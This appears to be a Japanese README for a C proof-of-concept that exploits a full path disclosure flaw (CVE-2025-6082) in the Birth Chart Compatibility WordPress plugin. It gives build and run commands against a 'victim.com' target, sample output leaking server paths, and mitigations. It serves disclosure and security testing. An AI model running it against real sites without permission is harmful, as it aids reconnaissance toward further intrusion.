
概念実証は「Birth Chart Compatibility」WordPressプラグイン(<=v2.0)のフルパス開示の脆弱性を悪用します。
作者: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE-2025-6082
脆弱性: Full Path Disclosure (CWE-200)
このProof‑of‑Conceptは、Birth Chart Compatibility WordPressプラグイン(バージョン≤ 2.0)のフルパス開示バグを悪用します。POCはプラグインのindex.phpエンドポイントにHTTP GETリクエストを送信し、PHPの警告や致命的エラーをキャプチャして、サーバーのファイルシステムパス(例:/var/www/html/wp-content/plugins/...やC:\xampp\htdocs\...)を抽出します。
フルパスが明らかになることで、攻撃者はさらにLocal File Inclusion(LFI)、Remote Code Execution(RCE)、その他の偵察攻撃を連鎖させることが容易になります。
gccまたは互換性のあるCコンパイラlibcurl 開発用ヘッダーargparse.c / argparse.hgcc -o fpd-poc exploit.c argparse.c -lcurl
./fpd-poc -u https://target.com [options]
オプション:
-u, --url (必須) 対象WordPressサイトのベースURL
-c, --cookies (オプション) クッキーファイルを使用
-v, --verbose curlの詳細出力を有効化
-f, --loop リクエストをN回繰り返す(例:-f 10)
-h, --help ヘルプメッセージを表示
例:
./fpd-poc -u https://victim.com
./fpd-poc -u https://victim.com -v -f 5 サンプル出力:
[+] リクエストが正常に送信されました
[+] 入力URL : https://victim.com
[+] 完全形式URL: https://victim.com/wp-content/plugins/birth-chart-compatibility/index.php
[+] HTTPコード : 200
====================================[応答]====================================
Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php): failed to open stream...
[+] 応答長 : 256
[+] キーワード発見: Warning:
[+] コンテキスト: Warning: include(/var/www/html/wp-content/plugins/birth-chart-compatibility/missing.php
「Birth Chart Compatibility」プラグインを、パッチがリリースされたら最新版(> 2.0)にアップデートしてください。
使用していない場合はプラグインを無効化または削除してください。
Webサーバーの設定(例:.htaccessやNginxルール)を介して、プラグインのPHPファイル(index.php)への直接アクセスを拒否してください。
免責事項 このコードは教育およびテスト目的でのみ提供されます。許可なく所有していないシステムや明示的なテスト許可がないシステムに対して使用することは違法となる可能性があります。